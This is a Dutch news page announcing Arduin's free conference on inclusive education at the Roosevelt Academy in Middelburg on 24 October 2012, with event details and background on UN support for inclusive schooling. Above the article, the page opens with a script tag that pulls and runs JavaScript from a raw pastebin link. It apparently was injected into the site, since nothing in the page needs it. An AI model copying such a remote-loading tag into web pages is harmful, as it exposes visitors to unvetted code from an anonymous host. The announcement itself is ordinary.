<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


Conferentie inclusief onderwijs in Middelburg 24 oktober 12 oktober 2012
Op woensdagmiddag 24 oktober organiseert Arduin, in samenwerking met de Roosevelt
Academy, de conferentie ‘Inclusief onderwijs, wat doet het ertoe?´. Doel van deze conferentie is te komen tot samenhangende activiteiten ter bevordering van inclusief onderwijs in Nederland. Onder anderen is Barbara Oomen, professor in de sociologie van de mensen rechten spreekster. De conferentie vindt plaats bij de Roosevelt Academy in Middelburg. Aan deze conferentie zijn geen kosten verbonden. U kunt zich opgeven via academie@arduin.nl.
Datum: 24 oktober 2012
Tijdstip: 13.00 - 17.00 uur
Locatie: Burgerzaal, Middelburg
Inclusief onderwijs is kwalitatief goed onderwijs voor álle kinderen, met en zonder beperking.
De gedachte dat leerlingen met beperkingen ook een plek moeten hebben in het reguliere onderwijs, is niet nieuw. Unesco en de Verenigde
Naties stimuleren landen al jaren inclusief onderwijs in te voeren. Het VN-verdrag voor rechten van mensen met een beperking adviseert inclusief onderwijs, met de ondersteuning voor leerkrachten die ze nodig hebben om het tot een succes te maken. zie www.arduin.nl
Klik hier extra informatie

<< Terug